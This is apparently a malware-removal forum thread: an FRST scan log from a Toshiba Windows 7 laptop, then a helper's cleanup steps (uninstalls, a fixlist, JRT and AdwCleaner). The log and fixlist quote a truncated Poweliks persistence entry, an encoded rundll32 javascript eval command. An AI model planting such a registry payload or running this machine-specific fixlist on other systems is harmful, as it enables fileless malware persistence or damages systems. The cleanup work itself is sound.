Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 13.2.6.1 - Synaptics Incorporated)
TeamSpeak 3 Client (HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\TeamSpeak 3 Client) (Version: 3.0.15 - TeamSpeak Systems GmbH)
Toshiba Application and Driver Installer (HKLM\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.0.9 - Toshiba)
TOSHIBA Assist (HKLM\...\{12B3A009-A080-4619-9A2A-C6DB151D8D67}) (Version: 2.01.11 - TOSHIBA)
TOSHIBA ConfigFree (HKLM\...\{F3529665-D75E-4D6D-98F0-745C78C68E9B}) (Version: 8.0.21 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.1 - TOSHIBA Corporation)
TOSHIBA DVD PLAYER (HKLM\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 3.01.0.07-A - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM\...\InstallShield_{53536479-DFB0-47ED-9D10-43F3708C222D}) (Version: 1.1.7.0 - TOSHIBA Corporation)
TOSHIBA Extended Tiles for Windows Mobility Center (HKLM\...\InstallShield_{617C36FD-0CBE-4600-84B2-441CEB12FADF}) (Version: 1.01.00 - TOSHIBA Corporation)
TOSHIBA Face Recognition (HKLM\...\InstallShield_{C730E42C-935A-45BB-A0C5-37E5234D111B}) (Version: 3.1.0.32 - TOSHIBA Corporation)
TOSHIBA Hardware Setup (HKLM\...\{D0387727-C89D-4774-B643-B9333EAA09DE}) (Version: 2.00.11 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.0.2 - TOSHIBA Corporation)
Toshiba Online Backup (HKLM\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 1.2.0.35 - Toshiba)
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.4.1.0 - TOSHIBA Corporation)
Toshiba Quality Application (HKLM\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.001.0000 - Toshiba)
TOSHIBA Recovery Media Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.0.2 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.2.9 - TOSHIBA)
TOSHIBA Speech System Applications (HKLM\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version: 1.00.2518 - )
TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version:  - )
TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version:  - )
TOSHIBA Supervisor Password (HKLM\...\{A208044D-A88B-4ACF-AE95-E4F213E6EDC0}) (Version: 2.00.09 - TOSHIBA Corporation)
TOSHIBA Value Added Package (HKLM\...\InstallShield_{FEDD27A0-B306-45EF-BF58-B527406B42C8}) (Version: 1.2.25 - TOSHIBA Corporation)
TOSHIBA Web Camera Application (HKLM\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.4 - TOSHIBA Corporation)
ToshibaRegistration (HKLM\...\{5AF550B4-BB67-4E7E-82F1-2C4300279050}) (Version: 1.0.3 - Toshiba)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Ventrilo Client (HKLM\...\{789289CA-F73A-4A16-A331-54D498CE069F}) (Version: 3.0.8 - Flagship Industries, Inc.)
VLC media player (HKLM\...\VLC media player) (Version: 2.1.5 - VideoLAN)
VoiceOver Kit (HKLM\...\{6B4AD1A9-E73A-4184-9D6B-072F8A3C5EBA}) (Version: 1.42.128.0 - Apple Inc.)
WildTangent Games (HKLM\...\WildTangent toshiba Master Uninstall) (Version: 1.0.0.71 - WildTangent)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Mobile Device Center (HKLM\...\{904CCF62-818D-4675-BC76-D37EB399F917}) (Version: 6.1.6965.0 - Microsoft Corporation)
Windows Mobile Device Center Driver Update (HKLM\...\{E7044E25-3038-4A76-9064-344AC038043E}) (Version: 6.1.6965.0 - Microsoft Corporation)
Woman Poker Player Lobby (HKLM\...\Woman Poker Player Lobby by CardRoom.com_is1) (Version:  - CardRoom International, LLC)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{039B2CA5-3B41-4D93-AD77-47D3293FC5CB}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{42481700-CF3C-4D05-8EC6-F9A1C57E8DC0}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AD848A76-F236-5EE2-819B-2BDE7ED40AE7}\InprocServer32 -> C:\Users\April\AppData\Roaming\Catalina – Print Savings\npBcsKtTcHW.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
 
==================== Restore Points  =========================
 
09-12-2014 18:48:06 Windows Update
10-12-2014 03:39:55 Windows Update
13-12-2014 04:37:19 Windows Update
13-12-2014 23:20:48 Windows Update
19-12-2014 02:30:49 Windows Update
23-12-2014 11:57:40 Windows Update
26-12-2014 20:08:39 Windows Update
30-12-2014 09:39:39 Windows Update
01-01-2015 00:31:30 Restore Operation
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 21:04 - 2009-06-10 16:39 - 00000824 ____A C:\windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0A8D3326-C4B7-4813-BD7D-4481491A4BE4} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {1AFBF29F-9EB9-450B-8B70-FAA7C5CFE916} - System32\Tasks\{9C18DC0D-56D4-4DC9-9963-E0801CA79D51} => pcalua.exe -a "c:\Poker Application\_uninstallation_info\UB\CasinoUninstall.exe"
Task: {25399E15-DD0C-4965-A43B-584BFFD0BC87} - System32\Tasks\MotoHelper MUM => C:\Program Files\Motorola\MotoHelper\MotoHelperUpdate.exe [2011-12-06] ()
Task: {6B3FD0C3-CF7A-4C5B-9825-1D6B8FB314B9} - System32\Tasks\MotoHelper Initial Update => C:\Program Files\Motorola\MotoHelper\MotoHelperUpdate.exe [2011-12-06] ()
Task: {748AB0F1-1C20-4007-8043-AC62FFDDD249} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-23] (Google Inc.)
Task: {7A25820B-8689-4578-9CC1-0E4E4E1D3153} - System32\Tasks\Adobe Flash Player Updater => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-12-12] (Adobe Systems Incorporated)
Task: {A4DE1393-A58E-4665-8CA9-9587551B3524} - System32\Tasks\{E94825DE-B4BE-402F-A640-81421CCF7FA4} => pcalua.exe -a "C:\Users\April\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G3DJWFVX\AdobeAIRInstaller.exe" -d C:\Users\April\Desktop
Task: {AF1FBC7E-E94A-40C3-8D79-6274840FD861} - System32\Tasks\{1037A8AB-79D4-4DFF-AC6F-320B65207154} => C:\Program Files\Skype\\Phone\Skype.exe [2013-11-18] (Skype Technologies S.A.)
Task: {BF303E8E-1A41-430C-9EE4-95521698FD95} - System32\Tasks\MotoHelper Update => C:\Program Files\Motorola\MotoHelper\MotoHelperUpdate.exe [2011-12-06] ()
Task: {C31BC5FB-A9F8-4EC2-A19C-2C6E927B298F} - System32\Tasks\MotoHelper Routing => C:\Program Files\Motorola\MotoHelper\MotoHelperUpdate.exe [2011-12-06] ()
Task: {D75E9E91-7C7C-4DF6-BBC9-E43DD2B730FE} - System32\Tasks\{ABED2CE2-1675-45C7-94E4-95CFBF59971C} => pcalua.exe -a "C:\Users\April\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8AYHR0JK\do-download[1].exe" -d C:\Users\April\Desktop
Task: {D9B2DD3F-ADAE-4A23-B3C4-6C1CB99C76DE} - System32\Tasks\ConfigFree Startup Programs => C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe [2009-07-13] (TOSHIBA CORPORATION)
Task: {E75DA587-9600-4EAA-9EC5-A02AA70080E5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-23] (Google Inc.)
Task: {F5E92D4A-A722-4B5A-863D-98B9C3BA5FFF} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2014-12-02] (AVAST Software)
Task: {F83343C8-C3FD-4643-86C6-AB04BF721F29} - System32\Tasks\{6C69C5F8-42EC-4867-87C6-C5AFE1F3D59D} => pcalua.exe -a "C:\Users\April\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S137ZGJX\RaginBet_Setup_WinXP_v03.39Rev366922.exe" -d C:\Users\April\Desktop
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-12-31 14:22 - 2014-12-31 14:22 - 02908160 _____ () C:\Program Files\AVAST Software\Avast\defs\14123101\algo.dll
2015-01-01 17:56 - 2015-01-01 17:56 - 02909696 _____ () C:\Program Files\AVAST Software\Avast\defs\15010101\algo.dll
2011-11-01 23:26 - 2011-11-01 23:26 - 00087912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2011-11-01 23:26 - 2011-11-01 23:26 - 01242472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2011-09-19 15:57 - 2011-09-19 15:57 - 00128336 _____ () C:\Program Files\Motorola Media Link\Lite\liveupdatetactics.dll
2011-09-19 15:57 - 2011-09-19 15:57 - 00023872 _____ () C:\Program Files\Motorola Media Link\Lite\DbAccess.dll
2011-09-19 15:59 - 2011-09-19 15:59 - 00465632 _____ () C:\Program Files\Motorola Media Link\Lite\sqlite3.dll
2011-09-19 15:57 - 2011-09-19 15:57 - 00045368 _____ () C:\Program Files\Motorola Media Link\Lite\NAdvLog.dll
2011-09-19 15:57 - 2011-09-19 15:57 - 00034128 _____ () C:\Program Files\Motorola Media Link\Lite\NFileCacheDBAccess.dll
2011-12-06 16:00 - 2011-12-06 16:00 - 00214896 _____ () C:\Program Files\Motorola\MotoHelper\MotoHelperService.exe
2011-12-06 16:00 - 2011-12-06 16:00 - 00784240 _____ () C:\Program Files\Motorola\MotoHelper\MotoHelperAgent.exe
2014-12-02 04:18 - 2014-12-02 04:18 - 38562088 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2014-12-12 19:58 - 2014-12-05 20:50 - 01077064 _____ () C:\Program Files\Google\Chrome\Application\39.0.2171.95\libglesv2.dll
2014-12-12 19:58 - 2014-12-05 20:50 - 00211272 _____ () C:\Program Files\Google\Chrome\Application\39.0.2171.95\libegl.dll
2014-12-12 19:59 - 2014-12-05 20:50 - 09009480 _____ () C:\Program Files\Google\Chrome\Application\39.0.2171.95\pdf.dll
2014-12-12 19:58 - 2014-12-05 20:50 - 01677128 _____ () C:\Program Files\Google\Chrome\Application\39.0.2171.95\ffmpegsumo.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\Program Files\Colt Poker:MID
AlternateDataStreams: C:\Program Files\Intertops Poker:MID
AlternateDataStreams: C:\Users\April\Desktop\Circulation Notices.eml:OECustomProperty
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\startupfolder: C:^Users^April^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk => C:\windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
MSCONFIG\startupreg: 00TCrdMain => %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: APSDaemon => "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: Conime => %windir%\system32\conime.exe
MSCONFIG\startupreg: Desktop Software => "C:\Program Files\Common Files\SupportSoft\bin\bcont.exe"  /ini "C:\Program Files\ComcastUI\Desktop Software\uinstaller.ini" /fromrun /starthidden
MSCONFIG\startupreg: EKStatusMonitor => C:\Program Files\Kodak\AiO\StatusMonitor\EKStatusMonitor.exe
MSCONFIG\startupreg: Gadwin PrintScreen => "C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe" /nosplash
MSCONFIG\startupreg: HotKeysCmds => C:\windows\system32\hkcmd.exe
MSCONFIG\startupreg: HSON => %ProgramFiles%\TOSHIBA\TBS\HSON.exe
MSCONFIG\startupreg: IgfxTray => C:\windows\system32\igfxtray.exe
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: MyTOSHIBA => "C:\Program Files\TOSHIBA\My Toshiba\MyToshiba.exe" /AUTO
MSCONFIG\startupreg: NortonOnlineBackupReminder => "C:\Program Files\TOSHIBA\Toshiba Online Backup\Activation\TobuActivation.exe" UNATTENDED
MSCONFIG\startupreg: Persistence => C:\windows\system32\igfxpers.exe
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
MSCONFIG\startupreg: SandboxieControl => "C:\Program Files\Sandboxie\SbieCtrl.exe"
MSCONFIG\startupreg: SmartFaceVWatcher => %ProgramFiles%\Toshiba\SmartFaceV\SmartFaceVWatcher.exe
MSCONFIG\startupreg: SmoothView => %ProgramFiles%\Toshiba\SmoothView\SmoothView.exe
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: swg => "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
MSCONFIG\startupreg: SynTPEnh => %ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe
MSCONFIG\startupreg: Teco => "%ProgramFiles%\TOSHIBA\TECO\Teco.exe" /r
MSCONFIG\startupreg: TosSENotify => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe
MSCONFIG\startupreg: TosWaitSrv => %ProgramFiles%\TOSHIBA\TPHM\TosWaitSrv.exe
MSCONFIG\startupreg: TPwrMain => %ProgramFiles%\TOSHIBA\Power Saver\TPwrMain.EXE
MSCONFIG\startupreg: TWebCamera => "%ProgramFiles%\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe" autorun
MSCONFIG\startupreg: Windows Mobile Device Center => %windir%\WindowsMobile\wmdc.exe
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-692471023-1834078390-643647909-500 - Administrator - Disabled)
April (S-1-5-21-692471023-1834078390-643647909-1001 - Administrator - Enabled) => C:\Users\April
Guest (S-1-5-21-692471023-1834078390-643647909-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-692471023-1834078390-643647909-1002 - Limited - Enabled)
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (01/01/2015 11:44:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcbb4
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0x41d0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (01/01/2015 11:08:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program wlmail.exe version 15.4.3555.308 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 3324
 
Start Time: 01d026414876299c
 
Termination Time: 131
 
Application Path: C:\Program Files\Windows Live\Mail\wlmail.exe
 
Report Id: f32992ff-9234-11e4-aa48-001e33ff5421
 
Error: (01/01/2015 11:06:30 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcbb9
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x001202bc
Faulting process id: 0x3aac
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (01/01/2015 10:59:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc959
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc00000fd
Fault offset: 0x0000afc8
Faulting process id: 0x2d5c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (01/01/2015 10:21:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcb52
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x0011fb5c
Faulting process id: 0x2988
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (01/01/2015 10:07:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00166f88
Faulting process id: 0x34d4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (01/01/2015 10:05:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bca28
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x001202bc
Faulting process id: 0x220c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (01/01/2015 08:34:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcd6e
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x000a31d8
Faulting process id: 0x33dc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (01/01/2015 08:24:00 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc6b8
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x0011fb5c
Faulting process id: 0x3af8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (01/01/2015 07:47:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bce11
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x0011fb5c
Faulting process id: 0x2280
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
 
System errors:
=============
Error: (01/01/2015 08:58:04 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
 
Error: (01/01/2015 04:08:29 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.
 
Error: (01/01/2015 01:52:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.
 
Error: (01/01/2015 00:38:39 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
 
Error: (01/01/2015 00:26:50 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (01/01/2015 03:33:05 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The UPnP Device Host service failed to start due to the following error: 
%%1069
 
Error: (01/01/2015 03:33:05 AM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The upnphost service was unable to log on as NT AUTHORITY\LocalService with the currently configured password due to the following error: 
%%50
 
To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).
 
Error: (01/01/2015 03:33:05 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1069upnphost{204810B9-73B2-11D4-BF42-00B0D0118B56}
 
Error: (01/01/2015 02:16:03 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (01/01/2015 02:13:07 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
 
Microsoft Office Sessions:
=========================
 
==================== Memory info =========================== 
 
Processor: Intel® Core™2 Duo CPU T6500 @ 2.10GHz
Percentage of memory in use: 65%
Total physical RAM: 2939.99 MB
Available physical RAM: 1027.2 MB
Total Pagefile: 5878.27 MB
Available Pagefile: 3250.81 MB
Total Virtual: 2047.88 MB
Available Virtual: 1928.32 MB
 
==================== Drives ================================
 
Drive c: (TI102805W0E) (Fixed) (Total:223.42 GB) (Free:138.82 GB) NTFS ==>[System with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 232.9 GB) (Disk ID: 1902C2AF)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=223.4 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=8 GB) - (Type=17)
 
==================== End Of Log =================

  • 0

#13
pystryker

pystryker

    Trusted Helper

  • Malware Removal
  • 3,886 posts
Well done, let's get started. :)

Please disable your antivirus for the duration of my instructions. Don't forget to re-enable them after you have completed the steps.


Step 1: Program Uninstalls and Chrome Plugin Removals

Please uninstall the following programs from your machine as they are adware/malware related programs:
  • Catalina Savings Printer
  • Colt Poker
Disable Chrome Plugins

There are some plugins in Chrome that need to be disabled, please follow the instructions below to disable them.
  • Start Chrome and type this into the address bar: chrome:plugins
  • This will display a page of all the installed plugins. Please disable the plugins in the list below by clicking the word Disable under each one.
  • If one of the plugins I've asked you to remove is not in the list, don't worry about it. Just move to the next one in the list. :)
  • Coupons Inc., Coupon Printer
  • Catalina Savings Printer
Step 2: Fix with FRST
  • Open notepad (Start =>All Programs => Accessories => Notepad). Please copy the entire contents of the code box below. (To do this highlight the contents of the box, right click on it and select copy.
  • Right-click in the open notepad and select Paste).
  • Save it on the desktop as fixlist.txt

Start
CreateRestorePoint:
CloseProcesses:
(Coupons.com Inc.) C:\Program Files\Coupons\CouponPrinterService.exe
C:\Program Files\Coupons
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {6f766fac-5ca7-11e1-ba6a-001e33ff5421} - E:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {952aea8a-075f-11e3-a52c-001e33ff5421} - E:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {97b3e8bf-0fa5-11e1-8250-001e33ff5421} - F:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
CHR HKU\S-1-5-21-692471023-1834078390-643647909-1001\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Microsoft\Internet Explorer\Main,Start Page Restore = http://www.startpage.com/
FF Plugin HKU\S-1-5-21-692471023-1834078390-643647909-1001: CouponNetwork.com/CMDUniversalCouponPrintActivator -> C:\Users\April\AppData\Roaming\CATALI~2\NPBCSK~1.DLL No File
C:\Users\April\AppData\Roaming\CATALI~2
R2 CouponPrinterService; C:\Program Files\Coupons\CouponPrinterService.exe [152560 2014-02-13] (Coupons.com Inc.)
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{039B2CA5-3B41-4D93-AD77-47D3293FC5CB}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{42481700-CF3C-4D05-8EC6-F9A1C57E8DC0}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AD848A76-F236-5EE2-819B-2BDE7ED40AE7}\InprocServer32 -> C:\Users\April\AppData\Roaming\Catalina Print Savings\npBcsKtTcHW.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
Emptytemp:
Hosts:
End


NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.


Run FRST and press the Fix button just once and wait. The tool will make a log on the desktop (Fixlog.txt) please post it in your next reply.


Step 3: Junkware Removal Tool

thisisujrt.gif Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
Step 4: AdwCleaner

Download ADWcleaner by clicking here. Please save it to your Desktop


adwcleaner2_zps680e0e15.jpg
  • Double click (Vista and 7 Users)right click the adwcleaner.exe file and click Run as Adminstrator and accept the UAC prompt to run AdwCleaner
